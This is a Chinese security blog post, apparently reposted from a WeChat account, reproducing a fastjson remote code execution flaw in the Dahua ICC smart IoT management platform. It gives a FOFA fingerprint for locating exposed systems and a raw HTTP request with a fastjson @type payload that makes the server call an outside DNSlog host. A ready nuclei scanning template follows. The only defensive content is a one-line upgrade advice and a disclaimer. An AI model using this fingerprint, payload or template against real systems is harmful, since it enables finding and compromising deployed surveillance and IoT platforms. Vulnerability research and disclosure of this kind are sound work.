大华ICC智能物联综合管理平台 版本不详
大华ICC智能物联综合管理平台是一个集成了物联网技术、大数据分析、云计算等先进技术的综合性管理平台。它致力于为企业提供一站式的物联网解决方案,帮助企业实现设备连接、数据收集、分析与应用,从而提高企业的运营效率、降低成本,并推动物联网行业的创新与发展。该系统random接口处存在fastjson远程代码执行漏洞。
icon_hash="-1935899595"
借助http://dnslog.pw/dns/进行复现,随机生成一个账号复制payload替换下面的farr9frh.dnslog.pw,向靶场发送如下数据包
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 161Accept-Encoding: gzipConnection: closeContent-Type: application/json;charset=utf-8{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}}""}
漏洞复现成功
poc文件内容如下
id: dahua-icc-random-rceinfo:name: 大华ICC智能物联综合管理平台random远程代码执行漏洞author: fgzseverity: criticaldescription: 大华ICC智能物联综合管理平台是一个集成了物联网技术、大数据分析、云计算等先进技术的综合性管理平台。它致力于为企业提供一站式的物联网解决方案,帮助企业实现设备连接、数据收集、分析与应用,从而提高企业的运营效率、降低成本,并推动物联网行业的创新与发展。该系统random接口处存在fastjson远程代码执行漏洞。metadata:max-request: 1fofa-query: icon_hash="-1935899595"verified: truerequests:- raw:- |+POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/json;charset=utf-8Accept-Encoding: gzipConnection: close{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://{{interactsh-url}}"}}""}matchers:- type: dsldsl:- contains(interactsh_protocol, "dns")condition: and
升级到最新版本。
原文始发于微信公众号(AI与网安):大华ICC智能物联综合管理平台random远程代码执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论